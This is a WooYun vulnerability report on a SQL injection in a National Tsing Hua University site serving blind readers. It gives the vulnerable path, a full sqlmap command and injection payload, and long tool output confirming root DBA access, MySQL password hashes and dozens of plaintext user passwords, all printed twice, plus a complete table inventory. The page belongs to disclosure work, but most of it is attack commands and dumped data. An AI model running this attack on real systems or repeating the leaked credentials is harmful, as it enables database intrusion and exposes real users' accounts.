当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157741

漏洞标题:国立清华大学某站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)(臺灣地區)

相关厂商:国立清华大学

漏洞作者: 路人甲

提交时间:2015-12-03 11:37

修复时间:2016-01-19 22:40

公开时间:2016-01-19 22:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-03: 细节已通知厂商并且等待厂商处理中
2015-12-05: 厂商已经确认,细节仅向厂商公开
2015-12-15: 细节向核心白帽子及相关领域专家公开
2015-12-25: 细节向普通白帽子公开
2016-01-04: 细节向实习白帽子公开
2016-01-19: 细节向公众公开

简要描述:

国立清华大学某站存在SQL注射漏洞(DBA权限+root密码+系统管理密码+大量用户明文密码)

详细说明:

地址:http://**.**.**.**/aviso/list/available_book.php?class=LA

$ python sqlmap.py -u "http://**.**.**.**/aviso/list/available_book.php?class=LA" -p class --technique=B --random-agent --batch  --no-cast --current-user --is-dba --users --passwords --count --search -C pass


current user:    'root@localhost'
current user is DBA: True
database management system users [14]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bplan'@'**.**.**.**'
[*] 'bplan'@'**.**.**.**'
[*] 'ideal'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'shadow'@'localhost'
[*] 'tcs'@'%'
[*] 'tcs'@'**.**.**.**'
[*] 'tcs'@'localhost'
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] bplan [1]:
password hash: 3dae533c070a7c05
[*] ideal [1]:
password hash: 39171de84099b35d
[*] project [1]:
password hash: 48b5354d1be7db97
clear-text password: project
[*] root [2]:
password hash: 1d7586b137a8cb57
password hash: NULL
[*] shadow [1]:
password hash: 6573964f2f148124
[*] tcs [2]:
password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87
password hash: 7032160f2b1b2321


Database: TextbookQuestionary96
Table: account
[29 entries]
+--------------+
| login_passwd |
+--------------+
| 11153 |
| 400924 |
| 86852011 |
| p221922 |
| PT10864 |
| PT11080 |
| PT22060 |
| PT26056 |
| PT30070 |
| PT403 |
| PT41401 |
| PT42050 |
| PT42149 |
| PT60043 |
| PT63850 |
| PT640501 |
| PT70047 |
| PT70148 |
| PT70449 |
| PT71088 |
| PT71242 |
| PT72242 |
| PT74169 |
| PT80748 |
| PT81157 |
| PT83052 |
| PT83067 |
| PT94641 |
| tel5048 |
+--------------+
Database: TextbookQuestionary
Table: account
[98 entries]
+--------------+
| login_passwd |
+--------------+
| |
| 0000 |
| 010335 |
| 064328 |
| 064342 |
| 1000801 |
| 107 |
| 110311t |
| 110312 |
| 1121 |
| 120402 |
| 140404 |
| 150303 |
| 190315t |
| 190406 |
| 202182 |
| 20403 |
| 2051001 |
| 210303 |
| 210309T |
| 211419 |
| 2115418 |
| 227 |
| 2304082 |
| 23250957 |
| 27977035 |
| 323301 |
| 3313sh |
| 3331 |
| 350001 |
| 363301 |
| 505661 |
| 54321 |
| 552588 |
| 553302i |
| 576579 |
| 8320364 |
| 84265751 |
| 86852011 |
| 90305 |
| 9184044 |
| adm109 |
| arrow743 |
| cyhsspec |
| fg222 |
| pcsh2010 |
| PT10051 |
| PT10671 |
| PT111-5 |
| PT11660 |
| PT11665 |
| PT20345 |
| PT22066 |
| PT22177 |
| PT2222 |
| PT23443 |
| PT24306 |
| PT26051 |
| PT26542 |
| PT30070 |
| PT30343 |
| PT32015 |
| PT32041 |
| PT32742 |
| PT33052 |
| PT35857 |
| PT40249 |
| PT40308 |
| PT40642 |
| PT40861 |
| PT41260 |
| PT41401 |
| PT42147 |
| PT42149 |
| PT50057 |
| PT54044 |
| PT54546 |
| PT60043 |
| PT60070 |
| PT63850 |
| PT65145 |
| PT70043 |
| PT70116 |
| PT80276 |
| PT80284 |
| PT80748 |
| PT81157 |
| PT81368 |
| PT83067 |
| PT85214 |
| PT85247 |
| PT93075 |
| PT97054 |
| special |
| tel5048 |
| trista |
| wutywuty |
| ym8175 |
+--------------+

漏洞证明:

---
Parameter: class (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: class=LA' AND 8567=8567#
---
web server operating system: FreeBSD
web application technology: PHP 4.4.9, Apache 2.2.18
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True
database management system users [14]:
[*] ''@'**.**.**.**'
[*] ''@'localhost'
[*] 'bplan'@'**.**.**.**'
[*] 'bplan'@'**.**.**.**'
[*] 'ideal'@'localhost'
[*] 'project'@'localhost'
[*] 'root'@'**.**.**.**'
[*] 'root'@'::1'
[*] 'root'@'**.**.**.**'
[*] 'root'@'localhost'
[*] 'shadow'@'localhost'
[*] 'tcs'@'%'
[*] 'tcs'@'**.**.**.**'
[*] 'tcs'@'localhost'
database management system users password hashes:
[*] [1]:
password hash: NULL
[*] bplan [1]:
password hash: 3dae533c070a7c05
[*] ideal [1]:
password hash: 39171de84099b35d
[*] project [1]:
password hash: 48b5354d1be7db97
clear-text password: project
[*] root [2]:
password hash: 1d7586b137a8cb57
password hash: NULL
[*] shadow [1]:
password hash: 6573964f2f148124
[*] tcs [2]:
password hash: *8D71256BB4128ECD2E4D94886D89500320B63C87
password hash: 7032160f2b1b2321
Database: TextbookQuestionary
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| Require | 2994 |
| DistributeHistory | 1856 |
| Student | 555 |
| SchoolList | 504 |
| DistributeVersion | 492 |
| NoRequireList | 384 |
| MailToAll | 301 |
| SubjectSetting | 203 |
| Require_backup | 202 |
| account | 98 |
| UserInformation | 98 |
| QuestionarySub | 22 |
| DistributeSub | 20 |
| PublisherSetting | 17 |
| QuestionaryPub | 11 |
| DLtimeline | 1 |
| QuestionaryDuration | 1 |
+---------------------------------------+---------+
Database: performance_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| setup_consumers | 8 |
| performance_timers | 5 |
| setup_timers | 1 |
+---------------------------------------+---------+
Database: mp3_file
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| `count` | 3229911 |
| nthu_new | 75170 |
| ckysc | 22389 |
| ckysc_back | 6454 |
| tmp | 5699 |
| blindreader | 2608 |
| mp3_new | 2203 |
| daisy | 2037 |
| lb | 1695 |
| ncue | 1470 |
| shadow | 1459 |
| reader | 1446 |
| reader_bfRename | 546 |
| tkblind | 296 |
| tape | 294 |
| braille | 62 |
| nthu_book_rf | 42 |
| mp3_file_cdremove | 10 |
| db_update_date | 1 |
| owl_update_date | 1 |
+---------------------------------------+---------+
Database: BlindSystem
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| bookHandleRec | 100596 |
| lendbook | 81713 |
| reader_lend | 78696 |
| bookLendRegTmp | 46761 |
| book | 17702 |
| bookView | 17702 |
| booktemp1 | 16676 |
| success | 13447 |
| bookCopy | 10162 |
| bookCount | 10101 |
| printDateReg | 9224 |
| bookCopyTmp | 8285 |
| man | 5467 |
| bookmail | 3855 |
| temp | 3673 |
| reader | 3506 |
| readerInfo_delete | 3324 |
| bookckysc | 2653 |
| bookAbstract | 2345 |
| readerTmp | 1969 |
| borrowing | 1439 |
| booklendreg2009 | 705 |
| textbook | 669 |
| textbooktemp | 579 |
| textbookold | 488 |
| CSD | 308 |
| Gio | 306 |
| bookLendReg | 257 |
| Giobook | 223 |
| MP3machineLend | 79 |
| tmp | 66 |
| failure | 57 |
| succProblem | 49 |
| bookRF | 42 |
| MP3machineList | 39 |
| textbook_lend | 23 |
| succTmp | 15 |
| worker | 13 |
| StatisticLogin | 5 |
| request | 2 |
| mngrLog | 1 |
+---------------------------------------+---------+
Database: mysql
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| help_relation | 992 |
| help_topic | 505 |
| help_keyword | 453 |
| help_category | 38 |
| `user` | 14 |
| tables_priv | 3 |
| db | 2 |
| proxies_priv | 2 |
+---------------------------------------+---------+
Database: TextbookQuestionary96
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| DistributeHistory | 1560 |
| DistributeHis_0912 | 1440 |
| Require0824 | 205 |
| Require | 202 |
| TESTofSQL | 196 |
| Student | 75 |
| account | 29 |
| UserInformation | 28 |
| QuestionarySub | 22 |
| QuestionarySub2 | 22 |
| QuestionarySub3 | 22 |
| DistributeSub | 20 |
| QuestionaryPub | 11 |
| QuestionaryPub1 | 11 |
+---------------------------------------+---------+
Database: aviso
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| reGuest | 46356 |
| success | 29875 |
| success20100309 | 27535 |
| recording | 4580 |
| newBook | 547 |
| UA | 426 |
| guest | 157 |
| GYnewbook | 117 |
| tmp | 87 |
| bookRF | 42 |
+---------------------------------------+---------+
Database: 94project
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| worker | 2369 |
| book_back | 804 |
| book | 458 |
| tmp | 308 |
| bookRF | 42 |
| working | 9 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 1450 |
| SESSION_VARIABLES | 321 |
| GLOBAL_VARIABLES | 310 |
| GLOBAL_STATUS | 309 |
| SESSION_STATUS | 309 |
| USER_PRIVILEGES | 203 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 195 |
| COLLATIONS | 195 |
| TABLES | 190 |
| PARTITIONS | 189 |
| STATISTICS | 105 |
| KEY_COLUMN_USAGE | 99 |
| TABLE_CONSTRAINTS | 60 |
| CHARACTER_SETS | 39 |
| SCHEMA_PRIVILEGES | 32 |
| PLUGINS | 17 |
| SCHEMATA | 11 |
| INNODB_CMPMEM | 8 |
| INNODB_CMPMEM_RESET | 8 |
| ENGINES | 6 |
| INNODB_CMP | 5 |
| INNODB_CMP_RESET | 5 |
| TABLE_PRIVILEGES | 3 |
| PROCESSLIST | 1 |
| VIEWS | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: TextbookQuestionary96
Table: account
[1 column]
+--------------+
| Column |
+--------------+
| login_passwd |
+--------------+
Database: TextbookQuestionary
Table: account
[1 column]
+--------------+
| Column |
+--------------+
| login_passwd |
+--------------+
Database: mp3_file
Table: shadow
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: mp3_file
Table: reader_bfRename
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: mp3_file
Table: reader
[1 column]
+----------+
| Column |
+----------+
| password |
+----------+
Database: mysql
Table: user
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: mysql
Table: servers
[1 column]
+----------+
| Column |
+----------+
| Password |
+----------+
Database: TextbookQuestionary96
Table: account
[29 entries]
+--------------+
| login_passwd |
+--------------+
| 11153 |
| 400924 |
| 86852011 |
| p221922 |
| PT10864 |
| PT11080 |
| PT22060 |
| PT26056 |
| PT30070 |
| PT403 |
| PT41401 |
| PT42050 |
| PT42149 |
| PT60043 |
| PT63850 |
| PT640501 |
| PT70047 |
| PT70148 |
| PT70449 |
| PT71088 |
| PT71242 |
| PT72242 |
| PT74169 |
| PT80748 |
| PT81157 |
| PT83052 |
| PT83067 |
| PT94641 |
| tel5048 |
+--------------+
Database: TextbookQuestionary
Table: account
[98 entries]
+--------------+
| login_passwd |
+--------------+
| |
| 0000 |
| 010335 |
| 064328 |
| 064342 |
| 1000801 |
| 107 |
| 110311t |
| 110312 |
| 1121 |
| 120402 |
| 140404 |
| 150303 |
| 190315t |
| 190406 |
| 202182 |
| 20403 |
| 2051001 |
| 210303 |
| 210309T |
| 211419 |
| 2115418 |
| 227 |
| 2304082 |
| 23250957 |
| 27977035 |
| 323301 |
| 3313sh |
| 3331 |
| 350001 |
| 363301 |
| 505661 |
| 54321 |
| 552588 |
| 553302i |
| 576579 |
| 8320364 |
| 84265751 |
| 86852011 |
| 90305 |
| 9184044 |
| adm109 |
| arrow743 |
| cyhsspec |
| fg222 |
| pcsh2010 |
| PT10051 |
| PT10671 |
| PT111-5 |
| PT11660 |
| PT11665 |
| PT20345 |
| PT22066 |
| PT22177 |
| PT2222 |
| PT23443 |
| PT24306 |
| PT26051 |
| PT26542 |
| PT30070 |
| PT30343 |
| PT32015 |
| PT32041 |
| PT32742 |
| PT33052 |
| PT35857 |
| PT40249 |
| PT40308 |
| PT40642 |
| PT40861 |
| PT41260 |
| PT41401 |
| PT42147 |
| PT42149 |
| PT50057 |
| PT54044 |
| PT54546 |
| PT60043 |
| PT60070 |
| PT63850 |
| PT65145 |
| PT70043 |
| PT70116 |
| PT80276 |
| PT80284 |
| PT80748 |
| PT81157 |
| PT81368 |
| PT83067 |
| PT85214 |
| PT85247 |
| PT93075 |
| PT97054 |
| special |
| tel5048 |
| trista |
| wutywuty |
| ym8175 |
+--------------+

修复方案:

上WAF。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-12-05 22:37

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价